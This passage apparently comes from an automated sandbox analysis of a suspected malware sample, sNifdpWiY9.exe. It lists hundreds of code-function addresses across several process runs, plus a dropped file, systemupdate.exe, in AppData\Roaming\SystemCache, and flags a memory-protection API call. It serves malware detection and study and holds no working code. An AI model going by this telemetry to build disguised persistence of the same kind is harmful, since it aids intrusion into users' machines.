Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3D9DCC NtProtectVirtualMemory,		9_2_000001DE4A3D9DCC

Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8B50C0	0_2_00007FF75F8B50C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8CF0C0	0_2_00007FF75F8CF0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8FB0C0	0_2_00007FF75F8FB0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9510F0	0_2_00007FF75F9510F0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8F8050	0_2_00007FF75F8F8050
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8F0080	0_2_00007FF75F8F0080
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8FEFD0	0_2_00007FF75F8FEFD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F908F20	0_2_00007FF75F908F20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8C9F90	0_2_00007FF75F8C9F90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F94EEE0	0_2_00007FF75F94EEE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8ECF0A	0_2_00007FF75F8ECF0A
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8D3F00	0_2_00007FF75F8D3F00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8F9EFD	0_2_00007FF75F8F9EFD
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8DDE20	0_2_00007FF75F8DDE20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8D7E80	0_2_00007FF75F8D7E80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F905E00	0_2_00007FF75F905E00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8E8CD0	0_2_00007FF75F8E8CD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8F2CDF	0_2_00007FF75F8F2CDF
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F914C70	0_2_00007FF75F914C70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F916B90	0_2_00007FF75F916B90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F909AD0	0_2_00007FF75F909AD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8E2AF0	0_2_00007FF75F8E2AF0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8F9AF0	0_2_00007FF75F8F9AF0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F904AE0	0_2_00007FF75F904AE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8E3A20	0_2_00007FF75F8E3A20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8C1A90	0_2_00007FF75F8C1A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8F6A90	0_2_00007FF75F8F6A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F984A00	0_2_00007FF75F984A00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F913A10	0_2_00007FF75F913A10
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8D8920	0_2_00007FF75F8D8920
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8C6840	0_2_00007FF75F8C6840
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9D1868	0_2_00007FF75F9D1868
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9037D0	0_2_00007FF75F9037D0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8DD720	0_2_00007FF75F8DD720
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F912790	0_2_00007FF75F912790
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9D1788	0_2_00007FF75F9D1788
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9D1760	0_2_00007FF75F9D1760
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8D96C0	0_2_00007FF75F8D96C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9D1700	0_2_00007FF75F9D1700
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9D16F8	0_2_00007FF75F9D16F8
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8BD710	0_2_00007FF75F8BD710
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F90A620	0_2_00007FF75F90A620
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8EB640	0_2_00007FF75F8EB640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8F2670	0_2_00007FF75F8F2670
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8FE530	0_2_00007FF75F8FE530
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8D1540	0_2_00007FF75F8D1540
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8C1580	0_2_00007FF75F8C1580
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9024B0	0_2_00007FF75F9024B0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8FB4CD	0_2_00007FF75F8FB4CD
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9114B0	0_2_00007FF75F9114B0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8C54E0	0_2_00007FF75F8C54E0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8EC418	0_2_00007FF75F8EC418
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8F1460	0_2_00007FF75F8F1460
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8EA480	0_2_00007FF75F8EA480
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9083D0	0_2_00007FF75F9083D0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8C8240	0_2_00007FF75F8C8240
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F9101F0	0_2_00007FF75F9101F0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F94D180	0_2_00007FF75F94D180
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F901160	0_2_00007FF75F901160
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F90B190	0_2_00007FF75F90B190
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 0_2_00007FF75F8F4181	0_2_00007FF75F8F4181
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3DA0F8	9_2_000001DE4A3DA0F8
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3EBC3C	9_2_000001DE4A3EBC3C
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3D683C	9_2_000001DE4A3D683C
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3EA104	9_2_000001DE4A3EA104
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3E50F4	9_2_000001DE4A3E50F4
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3F08E8	9_2_000001DE4A3F08E8
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3F5D38	9_2_000001DE4A3F5D38
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3E1174	9_2_000001DE4A3E1174
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3F29B8	9_2_000001DE4A3F29B8
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3E9DF8	9_2_000001DE4A3E9DF8
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3F1A54	9_2_000001DE4A3F1A54
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3F4648	9_2_000001DE4A3F4648
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3F4EAC	9_2_000001DE4A3F4EAC
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3DAF28	9_2_000001DE4A3DAF28
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3ECB7C	9_2_000001DE4A3ECB7C
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3EC7CC	9_2_000001DE4A3EC7CC
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC324160	9_2_00007FF6EC324160
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC327BD0	9_2_00007FF6EC327BD0
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_00007FF6EC3254C0	9_2_00007FF6EC3254C0
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A42883C	9_2_000001DE4A42883C
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A41343C	9_2_000001DE4A41343C
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A42D4E8	9_2_000001DE4A42D4E8
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A421CF4	9_2_000001DE4A421CF4
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A416CF8	9_2_000001DE4A416CF8
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A426D04	9_2_000001DE4A426D04
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A41DD74	9_2_000001DE4A41DD74
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A432938	9_2_000001DE4A432938
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A4269F8	9_2_000001DE4A4269F8
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A42F5B8	9_2_000001DE4A42F5B8
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A431248	9_2_000001DE4A431248
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A42E654	9_2_000001DE4A42E654
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A431AAC	9_2_000001DE4A431AAC
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A42977C	9_2_000001DE4A42977C
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A417B28	9_2_000001DE4A417B28
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A4293CC	9_2_000001DE4A4293CC
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8B50C0	12_2_00007FF75F8B50C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8CF0C0	12_2_00007FF75F8CF0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8FB0C0	12_2_00007FF75F8FB0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9510F0	12_2_00007FF75F9510F0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8F8050	12_2_00007FF75F8F8050
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8F0080	12_2_00007FF75F8F0080
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8FEFD0	12_2_00007FF75F8FEFD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F908F20	12_2_00007FF75F908F20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8C9F90	12_2_00007FF75F8C9F90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F94EEE0	12_2_00007FF75F94EEE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8ECF0A	12_2_00007FF75F8ECF0A
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8D3F00	12_2_00007FF75F8D3F00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8F9EFD	12_2_00007FF75F8F9EFD
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8DDE20	12_2_00007FF75F8DDE20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8D7E80	12_2_00007FF75F8D7E80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F905E00	12_2_00007FF75F905E00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8E8CD0	12_2_00007FF75F8E8CD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8F2CDF	12_2_00007FF75F8F2CDF
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F914C70	12_2_00007FF75F914C70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F916B90	12_2_00007FF75F916B90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F909AD0	12_2_00007FF75F909AD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8E2AF0	12_2_00007FF75F8E2AF0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8F9AF0	12_2_00007FF75F8F9AF0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F904AE0	12_2_00007FF75F904AE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8E3A20	12_2_00007FF75F8E3A20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8C1A90	12_2_00007FF75F8C1A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8F6A90	12_2_00007FF75F8F6A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F984A00	12_2_00007FF75F984A00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F913A10	12_2_00007FF75F913A10
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8D8920	12_2_00007FF75F8D8920
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8C6840	12_2_00007FF75F8C6840
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9D1868	12_2_00007FF75F9D1868
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9037D0	12_2_00007FF75F9037D0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8DD720	12_2_00007FF75F8DD720
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F912790	12_2_00007FF75F912790
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9D1788	12_2_00007FF75F9D1788
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9D1760	12_2_00007FF75F9D1760
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8D96C0	12_2_00007FF75F8D96C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9D1700	12_2_00007FF75F9D1700
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9D16F8	12_2_00007FF75F9D16F8
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8BD710	12_2_00007FF75F8BD710
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F90A620	12_2_00007FF75F90A620
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8EB640	12_2_00007FF75F8EB640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8F2670	12_2_00007FF75F8F2670
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8FE530	12_2_00007FF75F8FE530
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8D1540	12_2_00007FF75F8D1540
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8C1580	12_2_00007FF75F8C1580
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9024B0	12_2_00007FF75F9024B0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8FB4CD	12_2_00007FF75F8FB4CD
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9114B0	12_2_00007FF75F9114B0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8C54E0	12_2_00007FF75F8C54E0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8EC418	12_2_00007FF75F8EC418
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8F1460	12_2_00007FF75F8F1460
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8EA480	12_2_00007FF75F8EA480
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9083D0	12_2_00007FF75F9083D0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8C8240	12_2_00007FF75F8C8240
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F9101F0	12_2_00007FF75F9101F0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F94D180	12_2_00007FF75F94D180
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F901160	12_2_00007FF75F901160
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F90B190	12_2_00007FF75F90B190
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 12_2_00007FF75F8F4181	12_2_00007FF75F8F4181
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8B50C0	16_2_00007FF75F8B50C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8CF0C0	16_2_00007FF75F8CF0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8FB0C0	16_2_00007FF75F8FB0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9510F0	16_2_00007FF75F9510F0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8F8050	16_2_00007FF75F8F8050
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8F0080	16_2_00007FF75F8F0080
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8FEFD0	16_2_00007FF75F8FEFD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F908F20	16_2_00007FF75F908F20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8C9F90	16_2_00007FF75F8C9F90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F94EEE0	16_2_00007FF75F94EEE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8ECF0A	16_2_00007FF75F8ECF0A
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8D3F00	16_2_00007FF75F8D3F00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8F9EFD	16_2_00007FF75F8F9EFD
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8DDE20	16_2_00007FF75F8DDE20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8D7E80	16_2_00007FF75F8D7E80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F905E00	16_2_00007FF75F905E00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8E8CD0	16_2_00007FF75F8E8CD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8F2CDF	16_2_00007FF75F8F2CDF
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F914C70	16_2_00007FF75F914C70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F916B90	16_2_00007FF75F916B90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F909AD0	16_2_00007FF75F909AD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8E2AF0	16_2_00007FF75F8E2AF0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8F9AF0	16_2_00007FF75F8F9AF0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F904AE0	16_2_00007FF75F904AE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8E3A20	16_2_00007FF75F8E3A20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8C1A90	16_2_00007FF75F8C1A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8F6A90	16_2_00007FF75F8F6A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F984A00	16_2_00007FF75F984A00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F913A10	16_2_00007FF75F913A10
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8D8920	16_2_00007FF75F8D8920
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8C6840	16_2_00007FF75F8C6840
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9D1868	16_2_00007FF75F9D1868
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9037D0	16_2_00007FF75F9037D0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8DD720	16_2_00007FF75F8DD720
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F912790	16_2_00007FF75F912790
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9D1788	16_2_00007FF75F9D1788
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9D1760	16_2_00007FF75F9D1760
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8D96C0	16_2_00007FF75F8D96C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9D1700	16_2_00007FF75F9D1700
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9D16F8	16_2_00007FF75F9D16F8
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8BD710	16_2_00007FF75F8BD710
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F90A620	16_2_00007FF75F90A620
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8EB640	16_2_00007FF75F8EB640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8F2670	16_2_00007FF75F8F2670
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8FE530	16_2_00007FF75F8FE530
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8D1540	16_2_00007FF75F8D1540
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8C1580	16_2_00007FF75F8C1580
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9024B0	16_2_00007FF75F9024B0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8FB4CD	16_2_00007FF75F8FB4CD
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9114B0	16_2_00007FF75F9114B0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8C54E0	16_2_00007FF75F8C54E0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8EC418	16_2_00007FF75F8EC418
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8F1460	16_2_00007FF75F8F1460
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8EA480	16_2_00007FF75F8EA480
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9083D0	16_2_00007FF75F9083D0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8C8240	16_2_00007FF75F8C8240
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F9101F0	16_2_00007FF75F9101F0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F94D180	16_2_00007FF75F94D180
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F901160	16_2_00007FF75F901160
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F90B190	16_2_00007FF75F90B190
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 16_2_00007FF75F8F4181	16_2_00007FF75F8F4181
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8B50C0	19_2_00007FF75F8B50C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8CF0C0	19_2_00007FF75F8CF0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8FB0C0	19_2_00007FF75F8FB0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9510F0	19_2_00007FF75F9510F0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8F8050	19_2_00007FF75F8F8050
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8F0080	19_2_00007FF75F8F0080
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8FEFD0	19_2_00007FF75F8FEFD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F908F20	19_2_00007FF75F908F20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8C9F90	19_2_00007FF75F8C9F90
